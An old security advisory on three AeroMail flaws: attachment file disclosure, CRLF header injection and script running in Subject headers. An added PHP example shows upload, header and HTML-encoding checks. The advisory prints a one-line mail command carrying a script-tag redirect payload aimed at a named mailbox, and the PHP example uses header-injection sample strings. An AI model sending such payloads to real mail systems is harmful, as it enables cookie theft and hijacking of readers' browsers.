4th Mar 2002 [SBWID-5162]
COMMAND
AeroMail remote file access, java and header code insertion
SYSTEMS AFFECTED
AeroMail versions before 1.45
PROBLEM
Ulf Harnhammar says :
1) When sending e-mails, you can trick the attachment subsystem into
sending local files from the web server or remote files from URLs
instead of uploaded files as it should.
How is that possible? Well, after PHP has uploaded a file, it sets a
few variables with information about it. One of them is the filename
under which the uploaded file has been temporarily stored. It is
important to check that this variable was set by uploading a file. It
might also be normal POSTed data, in which case you end up with this
problem.
2) You can add additional headers to outgoing e-mail messages by
sending some normal data for the To or Cc or Subject fields, a CRLF and
then another header with some data. This can be used for adding
uuencoded attachments up in the headers with lines ending in CR instead
of CRLF, as previously discussed on Bugtraq.
3) JavaScript and HTML code is active when Subject headers are
displayed. This allows DOS attacks by redirecting, theft of cookies
etc.
Issues 1 and 2 require a valid user/password combination to be
exploited, while issue 3 is open to anyone.
Exploits :
========
Here are HTML exploits for issues 1 and 2. They are distributed as a
uuencoded, gzipped tar archive.
Issue 3 doesn't need a special exploit - you just send an ordinary
mail:
mail -s '<script>self.location.href="http://www.kuro5hin.org/"</script>' \
metaur@prontomail.com < /dev/null
SOLUTION
Upgrade to version 1.45 [http://the.cushman.net/projects/aeromail/]
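The three checks the advisory describes, shown as an added PHP example. This is not AeroMail's code or part of the original advisory; the function names are hypothetical and the sample inputs are constructed.

```php
<?php
// Added illustration; function names are hypothetical, not AeroMail's.

// Issue 1: accept an attachment only if PHP itself stored it as an upload.
// $field is the form field name; returns [temp path, display name] or null.
function attachment_from_upload(string $field): ?array
{
    if (!isset($_FILES[$field]) || $_FILES[$field]['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    $tmp = $_FILES[$field]['tmp_name'];
    // is_uploaded_file() is false for a local path or URL that arrived as
    // ordinary POSTed data, which is the case the advisory describes.
    if (!is_uploaded_file($tmp)) {
        return null;
    }
    return [$tmp, basename($_FILES[$field]['name'])];
}

// Issue 2: a To, Cc or Subject value must contain neither CR nor LF, since
// either one alone can start a new header line in the outgoing message.
function safe_header_value(string $value): ?string
{
    if (preg_match('/[\r\n]/', $value)) {
        return null; // reject rather than silently strip
    }
    return trim($value);
}

// Issue 3: encode the Subject before writing it into the HTML page.
function subject_for_html(string $subject): string
{
    return htmlspecialchars($subject, ENT_QUOTES, 'UTF-8');
}

// Constructed sample inputs.
var_dump(attachment_from_upload('attachment')); // no upload in this request
var_dump(safe_header_value("Hello"));
var_dump(safe_header_value("Hello\r\nBcc: someone@example.com"));
var_dump(safe_header_value("Hello\rbegin 644 x"));
echo subject_for_html('<script>self.location.href="http://www.kuro5hin.org/"</script>'), "\n";
```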